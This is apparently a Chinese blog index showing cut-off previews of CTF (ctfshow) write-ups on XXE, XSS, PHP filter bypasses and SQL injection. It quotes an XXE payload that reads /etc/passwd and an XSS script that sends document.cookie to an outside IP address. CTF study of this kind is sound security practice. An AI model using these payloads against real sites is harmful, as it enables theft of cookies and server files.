基础原理见这篇文章:XXE攻击原理 - 简书 (jianshu.com) 一般来说,参数实体方便之处在于在外部引用dtd的时候可以引用其它的已定义实体,比较方便嵌套 WEB373 payload: <!DOCTYPE ANY[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test1> <ctfshow>&xxe;</ctfshow> </test1> ctfshow应该作为根元素下的一个属…
基础原理见这篇文章:XXE攻击原理 - 简书 (jianshu.com) 一般来说,参数实体方便之处在于在外部引用dtd的时候可以引用其它的已定义实体,比较方便嵌套 WEB373 payload: <!DOCTYPE ANY[ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <test1> <ctfshow>&xxe;</ctfshow> </test1> ctfshow应该作为根元素下的一个属…
本篇wp是参考官方wp进行的复现(因为自己做不出来&&我就是个大菜鸡&&大佬们tql%%%) 主要是对官方wp做一些自己的补充,官方wp写的很详细了,这篇wp就相对简略一些 T1.一行代码 eregi函数匹配时不区分大小写,可以用这个特性绕过过滤,参数content传值是ctfshoW get_file_contents函数可以用php伪协议(给忘了...) T2.web签到 这道题直接做显然离谱,求a^3+b^3+c^3=114的解肯定求不出来() 正确方法是闭合括号拼接,这种方法…
XSS我一直想学,今天终于开始啦~ XSS三种利用方式:整理常见的三种XSS攻击类型_Edon-Du的博客-CSDN博客_xss类型 常用payload: 外带 <script> var img=document.createElement("img"); img.src="http://118.31.168.198:39543/"+document.cookie; </script> <script>window.open('http://118.31.168.198:3954…
哦对了,这篇文章还没写完,更新中... emmm又是好久没更新了...之后就在这里做个记录吧,有些新的思路可以做些分享 web174 看了一下,应该是有数字或者username=flag就不输出,主要是这个数字的限制有点烦,flag里面肯定是有数字的... 网上的wp很多用的布尔盲注,不过我当时还是想直接注出来,还是有办法的。 参考前面几道题,可以使用to_base64函数,对于一个字符而言,不管是数字还是字母,base64都是没有数字的。 所以,考虑一个一个注出来,利用substring函数依次截取单个字符,然…